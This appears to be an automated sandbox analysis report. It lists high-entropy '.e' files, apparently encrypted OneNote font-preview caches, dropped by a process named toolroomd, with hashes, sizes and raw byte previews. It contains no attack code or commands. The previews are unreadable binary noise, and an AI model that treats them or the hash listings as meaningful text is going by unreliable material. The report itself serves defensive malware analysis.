Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.N...F.'..@.._....,z...O...4.T.`.m.V....\|~anT..p...B....p..8..ZtB&o.Q...{&0......&G...>..V..\P..J.;7...k.....d.C...]..q-.n......p...8....j.w..NJ...#.5T.V...#..!`.A...\L..x...x.R.4.T.........g...AL.[q8.J.a......Np....jk..&...O..x.U.0y(....:=..a....Wv..'..C1mAD.\u..\|.#.)..x.D...:{'...g....hy\|..~xH.;.I..T.....>...w......U.e^...<.!3Mu.yk.^.....i..D...?{_.....7;E`.C.....;u'g....9%<..O...]D...?...g.\|..."D[..%&C..f../&...U....G.c........+..,........2..;..._.....w_.].I...7.^u/..u.....K.UM......i8V#...%..}.!..E.,..{.[..B.:.m..K.,...r[>...-.{..Rq@....t0.$j=%...H$6...O...................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.ArialRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	954
Entropy (8bit):	7.129517247502441
Encrypted:	false
SSDEEP:	24:EWNZyD4sjh3Fe5+fY5eAyHXCILsePc0m7:EWNZPMNf/P3PNpq
MD5:	36EEF7CF45B25F59ED00F26CA6C55038
SHA1:	1841C23F8873DF930C980D5F14A10F065CBCDB3B
SHA-256:	2A095D9DC05B532ADD462B671C087C3480ABB8AEA1738A64FDE96A323A978E57
SHA-512:	9E12C6E4E821050C87ACA77552F496F1E8B1978ECA96F695E310D72C8C420D16EACD5EBEA568E13FD32CAABDD7F320F81181DECA39A00B182CE8FCBA53F86578
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.N...F.'..@.._....,z...O...4.T.`.m.V....\|~anT..p...B....p..8..ZtB&o.Q...{&0......&G...>..V..\P..J.;7...k.....d.C...]..q-.n......p...8....j.w..NJ...#.5T.V...#..!`.A...\L..x...x.R.4.T.........g...AL.[q8.J.a......Np....jk..&...O..x.U.0y(....:=..a....Wv..'..C1mAD.\u..\|.#.)..x.D...:{'...g....hy\|..~xH.;.I..T.....>...w......U.e^...<.!3Mu.yk.^.....i..D...?{_.....7;E`.C.....;u'g....9%<..O...]D...?...g.\|..."D[..%&C..f../&...U....G.c........+..,........2..;..._.....w_.].I...7.^u/..u.....K.UM......i8V#...%..}.!..E.,..{.[..B.:.m..K.,...r[>...-.{..Rq@....t0.$j=%...H$6...O...................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.AthelasRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1250
Entropy (8bit):	7.3729001358625865
Encrypted:	false
SSDEEP:	24:E6g3uGM2Ziw1zGwbixRYcooLfhi1jov+yEGesePc0m7:E6guRGfMTbLfhi1jov+yJeNpq
MD5:	ABC46325B27B7554BF912D87943DC124
SHA1:	61985FA11B8181F299461A2692AD942517E445E1
SHA-256:	98F1D11AFA4169D0BB6F2530918B00FBC76563CFC74CFCDD489A219C931A93BD
SHA-512:	B1F2FC724C29FCF6675F486F9A0943F49FA1274DCBFF34B3742C2D02A80460AA3F5976F9966503F13C816AD4A434934D6D0AD5FD3BC5BEA44150FE671BF32778
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.S\|n....&......v.(.^...hg..m{....ei..@.I.`HI.P.A.6...}.+.y.C.w..<.yz..A.)....L...yM..e..,.].5"....$.".u.9).d:~o..O.........\!6A.Dc...$.........[.r..b\..c.9....8.x..Y...m$.#F.f@p...... .V`{2<.;...P....9.u.x....HL.{Xm#.9..(......O..2...s.GrwY..X..Z$S.3MN.~.~En%O..H.2...y\\V..0.s......+..FdV..\|2.b..4...../.L.`....v...q.G.9-.../@.1T.z..u/. ......9..\|9.....'.ZDTKq....h%.............&..0.m.LO..1E...GY.V'..T....494.+....j.~.'!u...y.J..N.L..h.....j6.......".x...$...b........'.;l..8..../.lSXF.rk.<.....@].Ws...q3....GsC...l...J.h..CtA .BLG.......G.>nx{..AP../...i"!.\|.F.+.)....Qce+...p..T.S.KM;'..98.ar.......k.Q....iv.Cx....]6P#..~7...]..U..p.)z..M6L2@...K.+.b.b.......H}.......ee...G...#f...m=..x..PC2H+{.nu...,..:...{.u...L.g..)P.h&'.L$L.p^+$.V.d!..z..wk.:..W..\w..9....N.C.m..=...B..1...g..........t!........uFh#..9...s.b..V0...}.e}~doIm..r- .JS.....................\.........^./k..`R..V5..jd..ysVT*9.X

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Avenir NextRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1418
Entropy (8bit):	7.455437474556927
Encrypted:	false
SSDEEP:	24:EBsizSHke8T9lSegAzWKdktjv7+2cYvrO5xhOhkIN9B5kmUV2sePc0m7:EBxYkv9lcAjU7+niahkNb+34Npq
MD5:	905876A510A9A7BDBF0BD30783742289
SHA1:	BF03A45D4F1DA763367A1F0A02C855BE1ACA16A3
SHA-256:	D9B3B2A72FB21DCA877F6F8BF7DD1BC6A2C2A92C1528F9B254F3CD40D21F86D7
SHA-512:	B541D8FB93B945BEF5284C13463996FE4C3FDDAD1224358CCD9533ACB975ACDF3EF966BF7372DD3CBB97A75F09C269F3711BF3C063B9106FFAD443E3D1B94A36
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...7F....d...<X...{......^..q..d.l[5.Uq...l>..5..../...C.M.......M.....:au...j...~.?0.e.u........m.U....iG..$.p..o..<..>'AFfd..z-.G..[....Z5.++..YvB.h.......V.r..Y.....R.c%.br........}A.....6#F..,......zj..Z.Q...n..F._.V......jb....+..J3.k...!....M.._4u8..s.K1.T.Um7{..r..H......;..z...WB...G(.).nV.7.X.\t.z..K..G.a...C.+.V.?).aR#Y.....o..b....C.-.....nj.oH.m.....0..~3i].m..8C.........5..H...\|..?.L....R..H\|l.?rO~.Q.-...L...E....I.>.2..(J..#.G.G<.w_Jp..r.c..\|3Z.`.%'..8.J....b!...?`.\|..N?..L.O...5k.5..g.I..[....Ts&.!......+..S2.'4>^[.FI....c:.#.dE....Zr@..\|...>.H........>T.N}..;8.Q.I."..e{.i...P.......K..S.9...."c_`.....rAa.....Y+.^MK...oOD.....Ma.....8.I.\,b....K......7...bA.y>.E..?....0d2....4..FZ..8.\|....Q..G.mA....Zpg...`.w7...q....V+=V....C.D.A."h........Mx...Wt.ys..rl...m+0_....i.s......Nli............+uu..9aR...\|.....n..i.........7Fn.0,.e5>.]g.<.&......J./.Q....*.Y..;...D.3N....).c.cv

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.AvenirBook.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1034
Entropy (8bit):	7.160632584023256
Encrypted:	false
SSDEEP:	24:E7Tr+mks6Foaupy0Kvfgoml4x2EBY46sePc0m7:E3r3LqkbKvfNx2EBL6Npq
MD5:	1B69A0C07EA3DAB1A160D9B98B3AAC0F
SHA1:	19C4BAF83A83ED42AFA480A06AA5B178FACE2597
SHA-256:	803464478CA2901875396F43622F0E26C7D9FD8A63E63504BC55BC2E2870F930
SHA-512:	E0629D957E037C23B31EDD8E20CF90A54C7EA867DEF47BF24A2EC385B5E2E8D4BA3DFA8E1968EA2B6C84BF97D9AB1CFFEDC75063CCE3202890C2D587A0185C32
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a3....z......3V...:...e.K,,..9\|.. ..+.zH..f...............+dp#dg.......<...]......-p\Y..Q..S.=.k\|.~#2R-.-5"s..}m....t..G.......e..Z.kT......k..b`..._...Y...w...3.[..F............h.........t.f9.LQ..e...Y''[D...V.<..mm......R.6.4....0=.NQ..{.E.....v$x.............n...;..\..ym.]8.I.....8K......gg....r....0..W;..\|/.S.y.....^RI.c....a..........aG..-K..N..%o..[..l....r...f...,....Y.N.N..$...a....z."...eb..q...L.....{.\...@..[.....w.w`....z..6^mN..ds.;WY....%..o.#........]...Yv.U..}..0+..\.j.n.95. ^"..%.....0...\|q.N.fA..i..~..t......Q.......q...f.<....a.2...FaDv...Ge.....Hd..e.1_.)\}..I.H.Xk.;......f69.~#2R-.-5.]..&...,.d...yD.\X.Zd.o....q....................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................................................................................................................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.AyuthayaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1362
Entropy (8bit):	7.444600624272667
Encrypted:	false
SSDEEP:	24:Eh1TsjzsjvWDZrPO/i443pilizpAQl0zowwUtckLRZYSrosePc0m7:Ej+z2v0O/5itAtowwUZLwSroNpq
MD5:	34FDB16AB26DDFD6F574F3FA6631FF5C
SHA1:	8CFB61970A03F29664E359B6B85C866EB7DF38AD
SHA-256:	EF20639C0DC58557A04C3D2F42C83E2F93DDFE1C825867B8539A76732F99DDB0
SHA-512:	38C50116EF64DC27AFD2B23B34F70FF07C345598ACFABCE7F62EE44F3CCED2CA7372C1A48199ECCB6FC9678762E23839ED8026B412681658254A71635EB62081
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.3.........."b.h.E..b.p....2.....uj.x..i...68D....o.u@5.P..........3...1...jK.u.....j0\|%..e.K...8/.../O0..6..S...l..gP.!B..&4.fW:..l.J./_Q...1_.r..oS...s..<....".......o....4.#.+..4.0...+j.T....".M.^.Kv..?..k....r~._G..l.X....CpLyI<.n.v...u....n.....j.4..N~$z.T...$.8'.0(.uo.C/...YU...0.+.X'.GWo.i......j..W .'..u./.8.s.........b.w.#........L.h.C...r...t..q..$...}...Z.&.(...:..vV.H.x....&GC...=.t...i.Ht.u....@".....:YZ#>[.....9....'....]../S.....K.......5......p:.qi..zt.x.,.U....F.......&H=}...%.C.<Q4.>...d.3....2u..._..j1A...C>.O.+..L..7...M...J..0..yI.!.&.Y....y.. ...&.....(Zl....m.:...<...-.2...&........<..hg.O....F\+..Xu$RF....}....;..J.&.[F.s...&.9...6`.G....k.4+.l....S...m#..y".....GK..o...x..]...\|...+'....9)8...39....N.sj#.A@.`..U..#/E1....?...c 4(+...-.F.J,xG.P..x......#3..n....sG(..."..h.H...`...-...?@.ga....w....w..m..a.#'.........`.na..h]..V8..7]W.B..\|1.@.9.]...>.h....+.....H".JV9j

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Bangla MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1490
Entropy (8bit):	7.4826865168005465
Encrypted:	false
SSDEEP:	24:YunHizSmVRQ/bCcPqhiiatkdk1PRpLnPlPpFYygVX79XYsWsePc0m7:YuOV/QjCsqkiaC2trPtpF2VXZXgNpq
MD5:	BB410DFE81FA3877958859E8ED7EDD15
SHA1:	83EA6EACBC53973883EC2A9E2C2ABBB0E2A1E407
SHA-256:	843ECB905D24CFB51005FBFF5BD765CF62811821DC2416262CEDF441E8D661C5
SHA-512:	09D80ABAC63D2E8077CD39306B5289BDC3B95DE63860EC6F5B7D2E5ACEF1037ED40FD1EF886D36603CF3D16CC3DE3E098913097DECC8590DAC5B162A24CDDA10
Malicious:	false
Preview:	.<.\|.....f.A....&.\Ef..j.=..$,.K..T..i .Y.a...[:.b..%.WS.V.!0....v.D.6...i..D&+.&..9.....w8>...y`9..Qc.]w..0.]......!=Y..BD.;..l7U..l{..\|..sR`2.x..._V..o.#...R'R...X...P.D....P.Jy..}fs[.P..I, #.$.<;l.y5jb.h....?.Zs~S.R..I..{.;Q.M.<.d...y.tY}.....K./.$#.......c.L......O.....s....l..=.5..M.....\.b.I..A.1.h.o..M...U.7.........%PJ....X.R......\v.z.[3..b.&.k.we},i..2......E.N....6.F..ZJ...h.T.....V.S....).d.......aI...<.W.\\|!Vv7.S1b.......)gSC.o.A.AV..V.+.......k. .15..H..V&..;t.....W......S...l......`..#4....&..\|..\|;1..:7.....x.@...........?N.1.,.z...\|$...%..r..\...Z{Cp~.!..y..Xc.+..7..lJ....QI..`<.\|o.KkT.l....2.i.{.v...f.../Z....U.a.=.5..).js..U..<q.i$P.Kx.YE..z.....D...m. GC...o.....]..Kr..>"...,@P.;...b'\......W...`....1.gW..i...sl.0..^=...).U...a0~..?~w\4..."z..m..2..Yl..vt..A.X8.&..q.u.!....~.B....L.n.69..<......t.&...M..p[.U..@....>6.M.#K.'.O.E.....Z...+...Y.....c).r...I...CuR....f.g.1..L .....8)B=.p.;....kI...A>...,aw:.Y...x6.oWD.!..

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Bangla Sangam MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1866
Entropy (8bit):	7.630023202333424
Encrypted:	false
SSDEEP:	48:EXknM6euS8iSuFUzres4H3mClqMIJrgM9BRNpq:ek5eu2FhsKmClqMQ5BRu
MD5:	1466D639A140F20B3B6E01DEE0EB1AC9
SHA1:	268091D8E36838A0795FC35A9049B15F1E5581A0
SHA-256:	AC36A3B2903361AC0DE6E447205F30EA98FD2BABED495F333441B42193AD5F86
SHA-512:	7AE367FF3B6AA485A4385136279C8FD8017AC99D73A3F3DFDC7F7CDFFDE9C2293C70A0A535B070A2C5E7CAB8CD4EB1B3E7E3D672F42F90EF404DE58C36AA12A0
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...}^...{.....y....}..JX.7........4..W`........(f.bR=.Rf...$.!.q..;.G...i.....z].F..B<6.8O..[..WY=`....=.]..c.......c.......c.....\|...M...p.M5...Y.@.r.L~........G......^.F...:.w.....pP.....I`..%...Z.9$U..^#..\|zN.0].<...J.....O..}.@..lV.h`..6.0.........X...j..PH..e..Bw..K..Z1%.)Q.=...p.T.K..........z..V..v.{.dh...V.c.?....&AC..Tx.;2.........R...V7m...EYj...\|G~.......\..[.~...9.].b..%....U......,Rf...t.y._...._...^.2.ZE-aT.>.....Rr.-L...P..?.7P.=.....<kkh..=........{.Pn..7.~...........p...8.f..F.3O&..9:.lW...@u...4...]z\|b...?.DpO..#".s1.A......j.m...A.)!.2....I.O..x.N...S..{-t4#p.....b.@.....#..m%......X...4..u.C.....$C..#..L...W.in.\T.7......<Z...1.._.A."j...;-.../..F`.7..C..S!].....Y/0..<.....p3...m.s..l_u...sI.....E..P.._5..+....y..%.P.....Gxi...7.....G.."ju.`..d.V......%wY.Y.n.T.;....O...>d..d..$&@...j......S...52./....*...&....0.Iv.c......uj.\|"....s.Y.0.2...,.W\.:e....k.!..c9M.rRN...k.@..

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.BaskervilleRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1346
Entropy (8bit):	7.406289990378358
Encrypted:	false
SSDEEP:	24:EG2ROC6k1rpIjErrveFaKHK4fh3fqpsGkA59WRf5MGROUN259EsePc0m7:EBOCFveF9h3fDGkAjWROtUN6aNpq
MD5:	B7447C9FE4C939329FC963058F85576C
SHA1:	6081C1DEB1E913679E6A2C1BB919E986C208BAE8
SHA-256:	C96E1F27B423EBC60ACB129E187A5B4CBBE4E43BD3D12017E91FF7B9DD7E2FB8
SHA-512:	1D5925650DEC30F851EBA7E44395026494465420097C7F9C0DA4547A3CD9B1A725608775E0E794ABBD74FA0187F833A9EAF557543C5165A7F4120AD70FEBE8C1
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..G_...m.(}I....K+....K......+b....q..p.."{3.`.o........M6S....B.5....%(.E.......#........NX......n...'..m.U....iG..$Q...(9...R...-.M"...xt..1I...o..6e...[>.5.\|}r..p\|7......b...].{&._...q.......}...q.a..Yl.....P.U.,.v.O:.9.>..[#..-..&...g.d..`......-....~....i..Q..,.....DK..".?.<d..?_\|.....>.2>g...kx....V...1..P`.[s+....F.AI..=U...$x..!U...S...........:D....2.h..I..]{t.~M...#@........x..P....z.[....5&..K..X+......(5...:.D..\|}.@1,.f....Q.@.U..h.K..S.@t.).g.T_.?..Q.[_Y..6.7..v..GB..Np/............gO...&.)...f.(..U+.. ....1..6..m..0.....\V.G.o@".-..y... ._..l2>......pPG-....]].)O...&.yDu.l..T..,...iv.)_,H....S.U.. ....%.t.e..Q.v.......'.b.._Q.....5.l6....."...^...N.).K..Cn.z.....&...B.-M:.c...wY9....9.I.H.B(6T.q..F.@.....c......m..]v....f\...d!@....4..q.].\."q....6..96D\|r.A#>..j.b........u%.ep..d.....__:..{.._..~G......G.?0}\|.......e4..7....1+6............j..O...T...>......$.M..>.1.A+q.m..}$.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.BatangCheRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1466
Entropy (8bit):	7.475245153858277
Encrypted:	false
SSDEEP:	24:ECI+5AboQska926aUwknzF9NQQUhXo3wim71HKgAwKsSsxMDswGsePc0m7:ECKbRa913LF98ogxHKxbjNGNpq
MD5:	EE2E17D59073EB8EB57DCF3A647894D5
SHA1:	C48DCEDF99E5B81C06619BC1615694E28C6CAFC7
SHA-256:	24C672814D4ABCD473FAAF621FE73409B58E0184B89ECCCEB81C6F459995DC4D
SHA-512:	B0D337208360A563684840D090DF3C032F86B6D96B25BFA128B6CC8334FCD128C0A6EA07C3AEEE421148ADF03055AB2122DBDCE39A6F2A4181D4AE661FE3AC84
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.y.>. ...1.o....#F.E...cS.".. ,...VZSz...I...D..9....U].,...dmp.0.NYJe~.S...T1/..mM..s4.Lw.........D.%.T..=f....O.X+g..!.$.......'....z.C..O.CV.u.Z-.d...j.t9....a.}u.Ow...['w.Sf....m.~.V.X..b..m..0.lp.g9.]A<.n....724...XB&.....6.....:t...\|.=...A.D>]...gwv..rFTY........B..D.].........ZF..lf'L.c....MjB..T.y..z.........le.P..l........y)....{. .. \|....zM..r...<....8.~.".,..O.6...)A.u.t...F}..Hf.....\|..J}9p..\|.6.wx.Mc#x.e.U. ..^[c\VzQ..X..t...$]..\|.M.U.....c...`...(4..E..#vX1.f_K@>>2..g....h.d.w8.?.....y....L.c.8.@U{Wf..HwT.~.3......#.\&.......v....+?>J...B..M.-.c...K.x..}...`............g".D.-.....J...^...#.+..].H....t.n...m....9.wi..0.jI......n....4..U.\jQ.__..f..9#;..~.k....a.:.E.'....sA.s.n....K.`.).-....Yr.n].b\|l....X..m."7.c<H...q....0..at.;..N.........UI)..1.z......;......Bi.X......M^C.D....Up{g...w..:......V...s..@.Q.bK/.r.;...T.+9........A.....[]....s.>.8....^5:q..)u..H. K8..........,.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.BatangRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1210
Entropy (8bit):	7.373384425592905
Encrypted:	false
SSDEEP:	24:EWtMuFzXsacgLk1YFKkFV39lpimwhUBq6qQcvAdqE5Mb7YCsePc0m7:Eg/Xs5UVFLFV3xDzUOcvAdDMbUCNpq
MD5:	7C104E76981AD526D860D29D542AE5BE
SHA1:	01D1963A0673A583039F772046264E6E446160A7
SHA-256:	472A6E4D3E3FD40CE01786D6013CF680B8DDA985F4A174ACC5A3836A92733B74
SHA-512:	5746BF42C29034BD589EC8C2A8031A93C89CFD6E310E78877BEC6A600725B4EF0E2F1E938FE3CB08232F3F0D990481AB466814CC1EA1FF6FE4BADA0F2FE97247
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a....%..{..pv0...f.d.~.EG....cs..Z.$..]"....[<.+..>1..n.,......._....t.....-..G...7.+...s....0JJ.....L.d.CS6 ....Rp.u>/.h.`....r..........=..{...?.."..3..sD.....U.4R..{...Q..........;^.5.Z......g~..[.l{.m8....w/.~D9b.x..F....y.t.p..R.4.2E Q.4b......3..s.[.a.g.0..@.?...).}.g2rM..........KT)U.N.q.u.....R..,.+D.p.:'r.$4'.j....&....GAtJ;..T"....H.......ER.+..Y..cQ..].F~po............Z\|n.zg......%..$f=..2E.j..-s../.k.-.{1.......1....j.M..C..Z.E.....@.G.%....T...B....Y...T.w<X....%.....8...4.F..z...U.W..J..z...B...G..Z..........7.h..d&....^2.~..B{.v.e.7S.g......T'G.-f2./.o&N....w.S..O......u..e...r.SGS...iib2........m..'&r7....... w>.#v...g.F...M........vg.....b..e......'.......;.\...?G..SD.~j..>....Y.}.p.Q...E..$CM.....wimK.. ...r.u.X.o1..^.v_._...Z._.~.L..b3I..V..g...;..uMI...?.h.&.LTq...S..._`.b...P...................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Big CaslonMedium.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1482
Entropy (8bit):	7.504801790682123
Encrypted:	false
SSDEEP:	24:EmWdk6N4M9Sd1g9QfH7cgSJk3TDOLe9/3TViqGYw2oe3LXmj4OsePc0m7:EmWdkGfe6qboMTDs5qGYw2o9jzNpq
MD5:	82D9DE474E7DDF1DEE7F439FDDC84D86
SHA1:	A430CD00A749B5DF0A3D2D8E1E2790C36B2E0036
SHA-256:	8C0B87A6DDED21734645587B3DC29D19A2BC096AEAE8D4A971BE0BE4C7D8A190
SHA-512:	6C88DC11111B60B3D372DB9310C5F6806377FF59499C95D8AFFA8D4789DBE7657943DE406A6D34DCCD0AE5114DB25F8D934DCAF921FADB5C0BFABB9D829F0BC3
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a@....o.........RUd..b.N..:./b.<f$......5.V.....y.......'A.-R.p..i}.....^.^B..E.....S.).E.m.9.f$u9B..=..d...)......6.......'.X.7....5w...........2...Y....f6./K......%=.5;@ .7.i.G...'.N.\)z....."...T.O..3].`.....c...\|.T..x.E. b.C.. Q9.N5..go%<(.....Y.{...L...\.Z..;.`..JaT9.UY..;k.....6.....,...2.n:...a.. z!3...3..N!...i..=.dJ...a.!..FOb..".@....}..>Uh. xVm..`..u.i.p9.c.\|H.>...!....]P&.7...]W.`Q.jy.w..<o.7.(x:.5..P\L!..7.(.w...0....s$#....r.+P.q...nPk.j..^....D.q.D..q,...M....V..SN{.^w.r..GJ1p;...k....zT2;.\f8...yX.k,E.f.l"...n...y........^Tr..;O..c.....K>....f.TN..."\U.....2...\=.Nq..~..d../.M...B.. ......-).. ...F]..........ZM=..Y.J3.W...Ohs.z;b[...0t.S..../o6s..\|[".o.C.d}.e.giO...[.;..L..r!...IH...6.N[X.Aw..#.:.eh........4...LX.l.P..\..}.0...qU.-Y......U....... ..f$...&. .$..X4..`k[.27.....x#'.6.!.<".....=..E.).M..m..@.v.Q.B..#A..T-.]...,.[u.=0...8..-/.h...7.......~..S.u..zNS...9.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Bodoni 72 OldstyleBook.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2002
Entropy (8bit):	7.662861749450173
Encrypted:	false
SSDEEP:	48:EXAijtpEdDoQIiv94AceghoyY/zfXJNpq:I1WdKtAYqyY/7Zu
MD5:	6CFFE4F9817090F1CABEEDE0D8A54C36
SHA1:	544F71CC89D70F35E4D9F5FFFDF6E0C0CA82FBF6
SHA-256:	5B5365DF4365CF05ED3A4B6989B37922C9F2A56D5A2C39C5C3DE99385DC6524C
SHA-512:	FBE5951FBDE613012646E9240B922BD0848BDB2B43A935BA9D65DBBAFD6939B580ADFE37FC9C6F0E125760F2373B0C4570AD77426211A93C67C96F55521FB65D
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.ay..h._+<9E..U .b.E.C..-&'...?.....C6..A..{..;a1...D.2.?.t..#...`w....>...=...i.Ff.Y..K.M..pc.:Z..5&...?GH.>..Cp._....Cp._......g....%L;qVL2...?.z..V.].w+qd..G.N[.D..5..F.9...g .F..E.....0.)K8....7.w)EO.v.. .%.s.....V.V`..4.q.zF..C<r.kB,..2.n..c.f...._..6./...8.q.......hV.`H.lP.xw....1...%.qB..L.m.z...he.l.....6.I. .K...i..u"..}2.....H.QL...........`..ua....\|..........J.\|.<......q..Y7}.O3N@..M...a:9.j.b...P2.J.vZ...%x...I.&^4n.Hog...8.5h...?.:...w.zT&..O..bkN.}FO&...~{6.{EE....~>."}.../>.:~.T........#.r...oa..f.n. .e...C...E.0.J.A.0..7#u.Z.7..\|Cu.m4.of..c.,.]m8...=z.-...$~.v.cm.m.z.!.O;WL.....U.xA5..x.zYHf%....@..{`...$K....Y]..y.^/%mR.\..q..$Y..(...`.....L.f6!(mb..'....^1T..........y5.]...qk...&.U..U>.......@x..~.!.tP...l...p....m.6.(.....E.H.r....?. wdX....=.[....O`...o...$.>......Q..\.)..'....A...u.....r...U..F}:M.g/RQx.wD0..7.@.w...q...RVp......h...6....9,^P.....jG.....(..(....~..fy.....\ ...P.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Bodoni 72 SmallcapsBook.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1858
Entropy (8bit):	7.622515479341129
Encrypted:	false
SSDEEP:	24:EDKVgdR6++KzYPKSrENwWuN+7UZJxRkmJJedaLFLu4YSBJoySfFZJRvGfJ8vUyDy:EWVADhnSrIxuYgxn/1u4Y1yWvvvNbNpq
MD5:	D292601D6486761E2B26578EC4421D63
SHA1:	9CDE1C6441318DD19C8F55DE9B431B2E5A93B9A4
SHA-256:	EC204FD0A2F61E767EB7D5FA2339CEF4D0FE0421F4CAD1B10D92CB66E6D665AC
SHA-512:	1C586275BB953B10F7FFF9152D90E729E5BBB8980C69C74D52A4A722762303FE1CE1210A9F9082C489DA391FCE0DBED36B900584EEF8DA807102F8CCF53C7ACD
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..De..s......;.$eT..Bz9.]..........%?5.....W..eC.G.7.&.W........V,.i../.].....0l..z..W.;C...l....lZu.hLfC..B.hLfC..B..%......P9J..2..o...T...R.7...0..D@..X...l.i.o....Z-....{k.+.F..{U.\v.......7.I\|..SJ.3!.r7\|..M..>.aO=<.=.V..m.....j..:..t..B?..t.b.M..J...>X(.@...3...x-.B.^gmP............sa..$.....<1..p.....0B.H.zC.Fj.B..06-...@.U.~\.>.C.&;..?....?..u.-.(F.cXjO0.[.)tk.\....L..XS.~e'..4..._....8K."c.........K.r.<...r.n....M{... `..OU..S9.iY..o(.,{.)..{.DD.!.<.Dt......f.X..s...-5....<V.m..FP..d..5wx....6...t.i..!..~.......?G........C...:.......\...D.)..mLT-.....T..\\,....H....GM..LI1...4......:.J.K.\|....Qk....a...ja..DR.AV.9U._.e..y...~._V.I.................Q.2..?..........s...F.p.lt...(6....!...Q.B..........;..0...mo.c#.^..-...r.b. ..O.5.J!B..j..=H....{.....M].../.'.6}....s....W._.I.S.a..........#.........3z.p....Z..I.%.....,t(....Ot...N...6..O...F..''....E...r..x..k.}.......

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Bodoni 72Book.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1394
Entropy (8bit):	7.45249672206795
Encrypted:	false
SSDEEP:	24:Emu9DKWPvYAR4Rbwrvc6UtNjRYtheLGop4EaW4EQKz0qHnYsePc0m7:Emu9+ijyRbwrvc6NhuGopkTKwqHnYNpq
MD5:	BDBD7383317B5064EEDED0AE092E381F
SHA1:	69DA1EB2EE790850A0D302AD715DC750666F7F44
SHA-256:	2CBF636CEA7E6B050F8465B9C097274CD4E8D33D99941D872DD4C248FCE2C867
SHA-512:	E93C09C05A69253BF18CDD9EE14009FF99C2EDCEF0D94B0BA856C21A0062EFE7E6221F473222112F79405D8D137A15CB19A092ACF0612C448CD35D22ED98FF18
Malicious:	false
